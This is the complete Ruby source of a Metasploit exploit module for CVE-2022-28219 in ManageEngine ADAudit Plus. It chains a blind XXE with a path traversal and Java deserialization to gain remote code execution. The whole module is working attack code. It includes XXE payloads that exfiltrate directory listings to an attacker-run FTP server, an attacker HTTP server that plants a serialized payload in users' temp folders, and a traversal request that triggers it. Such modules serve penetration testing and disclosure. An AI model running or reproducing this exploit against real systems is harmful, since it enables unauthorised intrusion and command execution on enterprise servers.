ManageEngine ADAudit Plus Path Traversal / XML Injection

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
include Msf::Exploit::Remote::TcpServer  
include Msf::Exploit::CmdStager  
include Msf::Exploit::JavaDeserialization  
include Msf::Handler::Reverse::Comm  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'ManageEngine ADAudit Plus CVE-2022-28219',  
'Description' => %q{  
This module exploits CVE-2022-28219, which is a pair of  
vulnerabilities in ManageEngine ADAudit Plus versions before build  
7060: a path traversal in the /cewolf endpoint, and a blind XXE in,  
to upload and execute an executable file.  
},  
'Author' => [  
'Naveen Sunkavally', # Initial PoC + disclosure  
'Ron Bowes', # Analysis and module  
],  
'References' => [  
['CVE', '2022-28219'],  
['URL', 'https://www.horizon3.ai/red-team-blog-cve-2022-28219/'],  
['URL', 'https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis'],  
['URL', 'https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html'],  
],  
'DisclosureDate' => '2022-06-29',  
'License' => MSF_LICENSE,  
'Platform' => 'win',  
'Arch' => [ARCH_CMD],  
'Privileged' => false,  
'Targets' => [  
[  
'Windows Command',  
{  
'Arch' => ARCH_CMD,  
'Platform' => 'win'  
}  
],  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 8081  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI_DESERIALIZATION', [true, 'Path traversal and unsafe deserialization endpoint', '/cewolf/logo.png']),  
OptString.new('TARGETURI_XXE', [true, 'XXE endpoint', '/api/agent/tabs/agentData']),  
OptString.new('DOMAIN', [true, 'Active Directory domain that the target monitors', nil]),  
OptInt.new('SRVPORT_FTP', [true, 'Port for FTP reverse connection', 2121]),  
OptInt.new('SRVPORT_HTTP2', [true, 'Port for additional HTTP reverse connections', 8888]),  
])  
  
register_advanced_options([  
OptInt.new('PATH_TRAVERSAL_DEPTH', [true, 'The number of `../` to prepend to the path traversal attempt', 20]),  
OptInt.new('FtpCallbackTimeout', [true, 'The amount of time, in seconds, the FTP server will wait for a reverse connection', 5]),  
OptInt.new('HttpUploadTimeout', [true, 'The amount of time, in seconds, the HTTP file-upload server will wait for a reverse connection', 5]),  
])  
end  
  
def srv_host  
if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))  
return datastore['URIHOST'] || Rex::Socket.source_address(rhost)  
end  
  
return datastore['SRVHOST']  
end  
  
def check  
# Make sure it's ADAudit Plus by requesting the root and checking the title  
res1 = send_request_cgi(  
'method' => 'GET',  
'uri' => '/'  
)  
  
unless res1  
return CheckCode::Unknown('Target failed to respond to check.')  
end  
  
unless res1.code == 200 && res1.body.match?(/<title>ADAudit Plus/)  
return CheckCode::Safe('Does not appear to be ADAudit Plus')  
end  
  
# Check if it's a vulnerable version (the patch removes the /cewolf endpoint  
# entirely)  
res2 = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri("#{datastore['TARGETURI_DESERIALIZATION']}?img=abc")  
)  
  
unless res2  
return CheckCode::Unknown('Target failed to respond to check.')  
end  
  
unless res2.code == 200  
return CheckCode::Safe('Target does not have vulnerable endpoint (likely patched).')  
end  
  
CheckCode::Vulnerable('The vulnerable endpoint responds with HTTP/200.')  
end  
  
def exploit  
# List the /users folder - this is good to do first, since we can fail early  
# if something isn't working  
vprint_status('Attempting to exploit XXE to get a list of users')  
users = get_directory_listing('/users')  
unless users  
fail_with(Failure::NotVulnerable, 'Failed to get a list of users (check your DOMAIN, or server may not be vulnerable)')  
end  
  
# Remove common users  
users -= ['Default', 'Default User', 'All Users', 'desktop.ini', 'Public']  
if users.empty?  
fail_with(Failure::NotFound, 'Failed to find any non-default user accounts')  
end  
print_status("User accounts discovered: #{users.join(', ')}")  
  
# I can't figure out how to properly encode spaces, but using the 8.3  
# version works! This converts them  
users.map do |u|  
if u.include?(' ')  
u = u.gsub(/ /, '')[0..6].upcase + '~1'  
end  
u  
end  
  
# Check the filesystem for existing payloads that we should ignore  
vprint_status('Enumerating old payloads cached on the server (to skip later)')  
existing_payloads = search_for_payloads(users)  
  
# Create a serialized payload  
begin  
# Create a queue so we can detect when the payload is delivered  
queue = Queue.new  
  
# Upload payload to remote server  
# (this spawns a thread we need to clean up)  
print_status('Attempting to exploit XXE to store our serialized payload on the server')  
t = upload_payload(generate_java_deserialization_for_payload('CommonsBeanutils1', payload), queue)  
  
# Wait for something to arrive in the queue (basically using it as a  
# semaphor  
vprint_status('Waiting for the payload to be sent to the target')  
queue.pop # We don't need the result  
  
# Get a list of possible payloads (never returns nil)  
vprint_status("Trying to find our payload in all users' temp folders")  
possible_payloads = search_for_payloads(users)  
possible_payloads -= existing_payloads  
  
# Make sure the payload exists  
if possible_payloads.empty?  
fail_with(Failure::Unknown, 'Exploit appeared to work, but could not find the payload on the target')  
end  
  
# If multiple payloads appeared, abort for safety  
if possible_payloads.length > 1  
fail_with(Failure::UnexpectedReply, "Found #{possible_payloads.length} apparent payloads in temp folders - aborting!")  
end  
  
# Execute the one payload  
payload_path = possible_payloads.pop  
print_status("Triggering payload: #{payload_path}...")  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => "#{datastore['TARGETURI_DESERIALIZATION']}?img=#{'/..' * datastore['PATH_TRAVERSAL_DEPTH']}#{payload_path}"  
)  
  
if res&.code != 200  
fail_with(Failure::Unknown, "Path traversal request failed with HTTP/#{res&.code}")  
end  
ensure  
# Kill the upload thread  
if t  
begin  
t.kill  
rescue StandardError  
# Do nothing if we fail to kill the thread  
end  
end  
end  
end  
  
def get_directory_listing(folder)  
print_status("Getting directory listing for #{folder} via XXE and FTP")  
  
# Generate a unique callback URL  
path = "/#{rand_text_alpha(rand(8..15))}.dtd"  
full_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{path}"  
  
# Send the username anonymous and no password so the server doesn't log in  
# with the password "Java1.8.0_51@" which is detectable  
# We use `end_tag` at the end so we can detect when the listing is over  
end_tag = rand_text_alpha(rand(8..15))  
ftp_url = "ftp://anonymous:password@#{srv_host}:#{datastore['SRVPORT_FTP']}/%file;#{end_tag}"  
serve_http_file(path, "<!ENTITY % all \"<!ENTITY send SYSTEM '#{ftp_url}'>\"> %all;")  
  
# Start a server to handle the reverse FTP connection  
ftp_server = Rex::Socket::TcpServer.create(  
'LocalPort' => datastore['SRVPORT_FTP'],  
'LocalHost' => datastore['SRVHOST'],  
'Comm' => select_comm,  
'Context' => {  
'Msf' => framework,  
'MsfExploit' => self  
}  
)  
  
# Trigger the XXE to get file listings  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,  
'ctype' => 'application/json',  
'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:#{folder}\"><!ENTITY % start \"<![CDATA[\"><!ENTITY % end \"]]>\"><!ENTITY % dtd SYSTEM \"#{full_url}\"> %dtd;]><data>&send;</data>")  
)  
  
if res&.code != 200  
fail_with(Failure::Unknown, "XXE request to get directory listing failed with HTTP/#{res&.code}")  
end  
  
ftp_client = nil  
begin  
# Wait for a connection with a timeout  
select_result = ::IO.select([ftp_server], nil, nil, datastore['FtpCallbackTimeout'])  
  
unless select_result && !select_result.empty?  
print_warning("FTP reverse connection for directory enumeration failed - #{ftp_url}")  
return nil  
end  
  
# Accept the connection  
ftp_client = ftp_server.accept  
  
# Print a standard banner  
ftp_client.print("220 Microsoft FTP Service\r\n")  
  
# We need to flip this so we can get a directory listing over multiple packets  
directory_listing = nil  
  
loop do  
select_result = ::IO.select([ftp_client], nil, nil, datastore['FtpCallbackTimeout'])  
  
# Check if we ran out of data  
if !select_result || select_result.empty?  
# If we got nothing, we're sad  
if directory_listing.nil? || directory_listing.empty?  
print_warning('Did not receive data from our reverse FTP connection')  
return nil  
end  
  
# If we have data, we're happy and can break  
break  
end  
  
# Receive the data that's waiting  
data = ftp_client.recv(256)  
if data.empty?  
# If we got nothing, we're done receiving  
break  
end  
  
# Match behavior with ftp://test.rebex.net  
if data =~ /^USER ([a-zA-Z0-9_.-]*)/  
ftp_client.print("331 Password required for #{Regexp.last_match(1)}.\r\n")  
elsif data =~ /^PASS /  
ftp_client.print("230 User logged in.\r\n")  
elsif data =~ /^TYPE ([a-zA-Z0-9_.-]*)/  
ftp_client.print("200 Type set to #{Regexp.last_match(1)}.\r\n")  
elsif data =~ /^EPSV ALL/  
ftp_client.print("200 ESPV command successful.\r\n")  
elsif data =~ /^EPSV/ # (no space)  
ftp_client.print("229 Entering Extended Passive Mode(|||#{rand(1025..1100)})\r\n")  
elsif data =~ /^RETR (.*)/m  
# Store the start of the listing  
directory_listing = Regexp.last_match(1)  
else  
# Have we started receiving data?  
# (Disable Rubocop, because I think it's way more confusing to  
# continue the elsif train)  
if directory_listing.nil? # rubocop:disable Style/IfInsideElse  
# We shouldn't really get here, but if we do, just play dumb and  
# keep the client talking  
ftp_client.print("230 User logged in.\r\n")  
else  
# If we're receiving data, just append  
directory_listing.concat(data)  
end  
end  
  
# Break when we get the PORT command (this is faster than timing out,  
# but doesn't always seem to work)  
if !directory_listing.nil? && directory_listing =~ /(.*)#{end_tag}/m  
directory_listing = Regexp.last_match(1)  
break  
end  
end  
ensure  
ftp_server.close  
if ftp_client  
ftp_client.close  
end  
end  
  
# Handle FTP errors (which thankfully aren't as common as they used to be)  
unless ftp_client  
print_warning("Didn't receive expected FTP connection")  
return nil  
end  
  
if directory_listing.nil? || directory_listing.empty?  
vprint_warning('FTP client connected, but we did not receive any data over the socket')  
return nil  
end  
  
# Remove PORT commands, split at \r\n or \n, and remove empty elements  
directory_listing.gsub(/PORT [0-9,]+[\r\n]/m, '').split(/\r?\n/).reject(&:empty?)  
end  
  
def search_for_payloads(users)  
return users.flat_map do |u|  
dir = "/users/#{u}/appdata/local/temp"  
# This will search for the payload, but right now just print stuff  
listing = get_directory_listing(dir)  
unless listing  
vprint_warning("Couldn't get directory listing for #{dir}")  
next []  
end  
  
listing  
.select { |f| f =~ /^jar_cache[0-9]+.tmp$/ }  
.map { |f| File.join(dir, f) }  
end  
end  
  
def upload_payload(payload, queue)  
t = framework.threads.spawn('adaudit-payload-deliverer', false) do  
c = nil  
begin  
# We use a TCP socket here so we can hold the socket open after the HTTP  
# conversation has concluded. That way, the server caches the file in  
# the user's temp folder while it waits for more data  
http_server = Rex::Socket::TcpServer.create(  
'LocalPort' => datastore['SRVPORT_HTTP2'],  
'LocalHost' => srv_host,  
'Comm' => select_comm,  
'Context' => {  
'Msf' => framework,  
'MsfExploit' => self  
}  
)  
  
# Wait for the reverse connection, with a timeout  
select_result = ::IO.select([http_server], nil, nil, datastore['HttpUploadTimeout'])  
unless select_result && !select_result.empty?  
fail_with(Failure::Unknown, "XXE request to upload file did not receive a reverse connection on #{datastore['SRVPORT_HTTP2']}")  
end  
  
# Receive and discard the HTTP request  
c = http_server.accept  
c.recv(1024)  
c.print "HTTP/1.1 200 OK\r\n"  
c.print "Connection: keep-alive\r\n"  
c.print "\r\n"  
c.print payload  
  
# This will notify the other thread that something has arrived  
queue.push(true)  
  
# This has to stay open as long as it takes to enumerate all users'  
# directories to find then execute the payload. ~5 seconds works on  
# a single-user system, but I increased this a lot for production.  
# (This thread should be killed when the exploit completes in any case)  
Rex.sleep(60)  
ensure  
http_server.close  
if c  
c.close  
end  
end  
end  
  
# Trigger the XXE to get file listings  
path = "/#{rand_text_alpha(rand(8..15))}.jar!/file.txt"  
full_url = "http://#{srv_host}:#{datastore['SRVPORT_HTTP2']}#{path}"  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(datastore['TARGETURI_XXE']).to_s,  
'ctype' => 'application/json',  
'data' => create_json_request("<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [<!ENTITY % xxe SYSTEM \"jar:#{full_url}\"> %xxe;]>")  
)  
  
if res&.code != 200  
fail_with(Failure::Unknown, "XXE request to upload payload failed with HTTP/#{res&.code}")  
end  
  
return t  
end  
  
def serve_http_file(path, respond_with = '')  
# do not use SSL for the attacking web server  
if datastore['SSL']  
ssl_restore = true  
datastore['SSL'] = false  
end  
  
start_service({  
'Uri' => {  
'Proc' => proc do |cli, _req|  
send_response(cli, respond_with)  
end,  
'Path' => path  
}  
})  
  
datastore['SSL'] = true if ssl_restore  
end  
  
def create_json_request(xml_payload)  
[  
{  
'DomainName' => datastore['domain'],  
'EventCode' => 4688,  
'EventType' => 0,  
'TimeGenerated' => 0,  
'Task Content' => xml_payload  
}  
].to_json  
end  
end  
`